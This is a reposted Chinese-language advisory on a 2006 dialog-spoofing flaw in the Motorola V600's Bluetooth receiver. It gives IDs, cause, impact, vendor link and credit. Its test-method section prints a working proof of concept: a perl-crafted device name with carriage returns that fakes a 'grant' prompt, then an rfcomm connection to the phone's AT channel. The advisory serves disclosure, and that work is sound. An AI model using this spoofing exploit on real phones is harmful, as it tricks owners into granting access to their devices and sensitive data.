当前位置: 王朝网络 >> other >> Motorola蓝牙接口存在对话框伪造漏洞

Motorola蓝牙接口存在对话框伪造漏洞

王朝other·作者佚名 2008-05-19

漏洞信息

Motorola V600支持蓝牙功能。

Motorola V600蓝牙接收存在对话框伪造问题，远程攻击者可以利用漏洞获得敏感信息。

当接收到蓝牙通信时，攻击者可利用该问题诱使用户进入AT访问设备，可借此获得敏感信息。

BUGTRAQ ID: 17190

CNCAN ID:CNCAN-2006032305

漏洞消息时间:2006-03-22

漏洞起因

输入验证错误

影响系统

Motorola V600

危害

远程攻击者可以利用漏洞获得敏感信息。

攻击所需条件

攻击者必须可以访问Motorola V600。

测试方法

# hciconfig hci0 name `perl -e 'print "Press\x0dgrant\x0dto\x0ddisable\x0dmute\x0d\x0d"'`

# rfcomm connect 0 00:15:A8:74:87:3E 3 (wait for user to press grant)

Connected /dev/rfcomm0 to 00:15:A8:74:87:3E on channel 3

Press CTRL-C for hangup

厂商解决方案

联系供应商获得补丁方案：

http://www.motorola.com/motoinfo/product/details/0,,11,00.html

漏洞提供者

Kevin Finisterre

漏洞消息链接

http://marc.theaimsgroup.com/?l=bugtraq&m=114304846013066&w=2

漏洞消息标题

DMA[2006-0321a] - 'Motorola P2K Platform setpath() overflow and Blueline

免责声明：本文为网络用户发布，其观点仅代表作者个人观点，与本站无关，本站仅提供信息存储服务。文中陈述内容未经本站证实，其真实性、完整性、及时性本站不作任何保证或承诺，请读者仅作参考，并请自行核实相关内容。